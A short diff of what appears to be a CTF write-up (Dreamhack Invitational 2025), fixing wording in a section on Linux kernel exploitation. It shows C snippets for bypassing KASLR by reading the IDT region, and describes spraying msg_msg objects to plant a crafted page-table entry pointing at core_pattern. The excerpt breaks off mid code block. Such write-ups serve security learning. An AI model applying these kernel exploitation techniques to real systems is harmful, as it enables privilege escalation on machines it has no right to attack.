rqdaA/house-of-rona/content/dreamhack_inv_2025/index.md

 ### kaslr bypass

-Leak kbase by reading IDT region, which is located at fixed virtual address.
+We can leak kbase by reading IDT region, which is located at fixed virtual address.

 ```c
   unsigned long gate = *(long *)PTI_TO_VIRT(0x2000 + 1, 1, 0, 6, 0) >> 52;
   unsigned long kbase_diff = gate - 0x820;
 ```

-To load cracted value as `pml4e`, spray bunch of `msg_msg` struct after `QVM_LOAD`.
-It contains the all possible pointer to `&core_pattern` with kaslr.
+To load crafted value as `pml4e`, spray a bunch of `msg_msg` struct after `QVM_LOAD`.
+It contains the all possible pointer to `&core_pattern` considering KASLR.

 ```c
   rep(i, 0x1f8) {